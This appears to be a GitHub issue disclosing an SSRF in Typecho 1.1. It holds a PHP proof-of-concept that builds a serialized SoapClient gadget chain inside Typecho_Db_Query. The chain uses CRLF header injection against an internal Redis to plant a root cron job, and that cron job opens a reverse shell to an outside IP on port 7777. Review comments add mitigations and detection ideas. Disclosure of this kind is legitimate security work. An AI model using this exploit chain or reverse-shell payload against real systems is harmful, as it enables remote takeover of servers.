
Typecho(1.1) has Server-Side Request Forgery(SSRF)  #157

Open
@de1ayg

Description

@de1ayg

Typecho(1.1) SSRF:

Requires PHP's SoapClient class (the soap extension) to be available, and the serialized object to be unserialized by the application.

POC:

<?php
	
	/**
	 * Minimal local declaration of a class named Typecho_Db_Query.
	 *
	 * It contains no query logic: it only declares three private properties and
	 * a constructor that fills them, so that serialize() emits an object record
	 * carrying this class name and these property names.
	 * NOTE(review): presumably mirrors the property layout of the class of the
	 * same name shipped with Typecho 1.1 — confirm against that source.
	 *
	 * Defensive reading: nothing constrains what $_adapter may hold, so code that
	 * unserializes untrusted input into this class and later calls methods on the
	 * adapter would be calling them on an object chosen by the sender.
	 */
	class Typecho_Db_Query{
	  
	    // Default pre-build state copied into every instance; only 'action' is set.
	    private static $_default = array(
	        'action' => 'SELECT',
	    );
	
	    // Untyped slot: receives whatever object the constructor is given.
	    private $_adapter;
	    private $_sqlPreBuild;
	    private $_prefix;
	
	    /**
	     * Stores the supplied adapter and prefix and initialises the pre-build array.
	     *
	     * @param mixed $adapter object kept in $_adapter; no type or class check is made
	     * @param mixed $prefix  value kept in $_prefix
	     */
	    public function __construct($adapter, $prefix){
	        // Bound by reference to the constructor's local parameter.
	        $this->_adapter = &$adapter;
	        $this->_prefix = $prefix;
	
	        $this->_sqlPreBuild = self::$_default;
	    }
	}
	
	// Reviewer summary (defensive): this script only builds a serialized,
	// base64-encoded array and prints it. The page does not show which Typecho
	// entry point unserializes such a value, so that part must be confirmed
	// against the Typecho 1.1 source before assessing exposure.
	//
	// Mitigations a maintainer or operator would want:
	//   - do not pass request-controlled data to unserialize(); use JSON, or
	//     unserialize($data, ['allowed_classes' => false]) where objects are not needed;
	//   - disable the soap extension if the application does not use it;
	//   - restrict outbound connections from the web tier to internal services;
	//   - require authentication on Redis and do not run it with write access to
	//     system directories.
	// Detection idea: base64 request values that decode to PHP serialized data
	// naming the SoapClient class, and web-server-originated traffic to internal
	// service ports.

	// Redacted address; port 6379 is the default Redis port, i.e. the request is
	// aimed at a non-HTTP internal service rather than a web endpoint.
	$target = "http://XXX.XXX.182.9:6379";
	
	// Request body: Redis commands (set / config set dir / config set dbfilename /
	// save) separated by the '^^' placeholder. The impact shown is that SSRF
	// reaching an unauthenticated Redis can be turned into a file write under the
	// cron spool directory.
	$post_string = 'set xx "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/XXX.XXX.180.248/7777 0>&1\n\n" ^^ config set dir /var/spool/cron/ ^^ config set dbfilename root ^^ save';
	
	// Extra header lines to splice in; empty in this example.
	$headers = array(
	
	);
	
	// SoapClient in non-WSDL mode (first argument null, 'location' and 'uri' given).
	// The 'user_agent' option is loaded with placeholder-separated header lines and
	// the body above: the technique depends on that option being written into the
	// outgoing request without line breaks being filtered.
	$a = new SoapClient(null,array('location' => $target,'user_agent'=>'wupco^^Content-Type: application/x-www-form-urlencoded^^'.join('^^',$headers).'^^Content-Length: '. (string)strlen($post_string).'^^^^'.$post_string,'uri'=>'hello'));
	
	// Serialize, then swap each two-byte '^^' placeholder for the two-byte "\n\r"
	// sequence (same length, so the serialized string-length prefixes stay valid),
	// then rebuild the object. This local round-trip is only payload construction;
	// it is not the vulnerable unserialize() call in the application.
	$b = serialize($a);
	$b = str_replace('^^',"\n\r",$b);
	$c = unserialize($b);
	
	// Place the SoapClient where a database adapter would normally sit.
	$query = new Typecho_Db_Query($c,'B');
	
	// Array with 'adapter' and 'prefix' keys.
	// NOTE(review): presumably the shape the consuming Typecho code expects — confirm.
	$exp = array(
	        'adapter' => $query,
	        'prefix'  => 'typecho_'
	);
	
	// Prints the base64-encoded serialized array; nothing is sent by this script.
	echo base64_encode(serialize($exp));
	
?>
